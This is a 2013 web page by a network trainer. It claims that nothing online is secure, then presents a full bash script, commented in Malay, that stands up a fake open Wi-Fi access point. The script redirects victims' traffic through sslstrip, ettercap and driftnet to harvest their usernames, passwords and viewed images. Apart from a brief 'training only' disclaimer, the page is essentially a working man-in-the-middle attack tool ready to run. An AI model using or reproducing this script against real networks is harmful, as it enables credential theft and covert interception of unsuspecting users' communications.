CERTIFIED TRAINER, CERTIFIED NETWORK ENGINEER, CONSULTANT
& SUBJECT MATTER EXPERT
Shah Alam, Selangor 40000
latiffes
Nothing is secured today. The only security there is whispering ear to ear, Yes and I mean Whispering. If you are online or using technology devices you will never have any privacy and there is and always will be a way to get into your personal life and anything there is to know about you.
All the technology we use today is managed by someone and that someone has the capacity to do what ever he wish to do.
There will always be an intermediate device some where between you and the other person you are comunicating with. All one needs to do is to pick up the data while passing through their devices
Mastering communication protocols will allow you to understand the way all devices communicate with each other. These devices actually talks to one another. Along the way, the path, be it at the end point or perhaps at the very beginning itself there will always be that one 1 millisecond gap or pause that is unnoticeable.
The following codes are some of the codes I use to intercept all HTTPS traffic and get the user's username and password. This codes are for learning purposes in my training classes. Never use it for bad intentions.
====================
#!/bin/bash
# WirelessLatiffesaV3.sh - Versi ke 3
# RogueLatiffesa.sh
echo
echo "RogueLatiffesa AP by Latiffesa "
echo
route -n -A inet | grep UG
echo
echo
echo "Masukkan IP address gateway, Tu la yang kat atas tu haaa: "
read -e gatewayip
echo -n "Masukkan Interface yang connect ke Internet, contohnya eth0 la: "
read -e internet_interface
echo -n "Masukkan interface fake AP, contohnya you punya wlan0, hmmmm: "
read -e fakeap_interface
echo -n "Masukkan FreeWirelessInternet sebagai nama ESSID Access Point. Case sensitif ni: "
read -e ESSID
echo
echo "Minta tunggu selama 20 saat, sabar kekadang download lambat skit"
echo
mkdir -p /pentest/wireless/airssl/driftnetdata
apt-get install dhcp3-server
sleep 20
echo
echo "Minta tunggu selama 5 saat saja ni, sekejap ye 1 2 3 4 ..."
echo
cd /pentest/web/sslstrip/
python setup.py install
sleep 10
# Dhcpd setup
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}" > /pentest/wireless/airssl/dhcpd.conf
airmon-ng
airmon-ng start wlan0
# Setup Fake AP
echo "
AP fake nak up dah....ready ye"
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "FreeWirelessInternet" mon0 & wlan0=$!
sleep 2
# Tables
echo "
Ni tengah nak buat forwarding kat iptables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP
echo "
Latiffesa tengah setup DHCP plak ni....ready ye..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3
# Sslstrip
echo "
Sslstrip ni pun dah nak up... tengok kat tepi kiri tu, atas"
xterm -geometry 75x15+1+200 -T Sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
# Ettercap
echo "
Setup ettercap plak ni...adoi letih ni"
echo
echo "Ettercap ni guna basic setup je la, tekan N tapi kalau nak tukar setting gak yang filter-filters tu la,, Tekan Y lor "
echo "Y atau N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi
if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
Ettercap setting ni guna switch -u dan -p.Output Etterccap ada di /pentest/wireless/airssl/passwords.Kalau u pilih option ni mesti nak tau switch apa nak guna, jika tidak .. jeng jeng jeng :( "
echo
read "eswitch"
echo "
Ettercap sedang nak up ni..."
xterm -geometry 73x25+1+300 -T Ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi
if [ $ETTER = "n" ] ; then
echo
echo "
Ettercap up up up..."
xterm -geometry 73x25+1+300 -T Ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi
echo "
SSLog nak up..."
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
# Driftnet
echo
echo "
Driftnet nak guna jugak ke?"
echo
echo "Nak start driftnet tak? Guna ni untuk capture gambar yang orang tu tengok,(Tak payah la , nanti slow la, leceh), Tapi kalau nak gak tekan Y "
echo "Y atau N "
read DRIFT
if [ $DRIFT = "y" ] ; then
echo "
Driftnet sedang up ni..."
xterm -geometry 75x20+1+800 -T Drifnet -e driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 1
fi
clear
echo
echo "
Wokey dah siap, now tunggu Mangsa ..."
echo "Nanti check kat /pentest/wireless/airssl/passwords. Gambar Driftnet ada di /pentest/wireless/airssl/driftftnetdata "
echo
echo "
NI JANGAN LUPA YEK..."
echo "Bila nak balik rumah atau office , tamatkan dengan Y,
Kalau tidak corupt la you punya notebook, makan tuan :) "
read WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "
Housekeeping airssl dan reset iptables..."
airmon-ng stop mon0
airmon-ng stop wlan0
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
kill ${wlan0}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}
airmon-ng stop mon0
airmon-ng stop wlan0
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "
Housekeepinh All Done :)..."
echo "
Dont use for bad intention , always take the exam first he he, adios amigos and sanyorita"
exit
fi
exit
===========================================
Come and join my technology update and understand that security is only there for business purposes only.. but not for security
Copyright 2013 Abdul Latiff Esa. All rights reserved.
Shah Alam, Selangor 40000
latiffes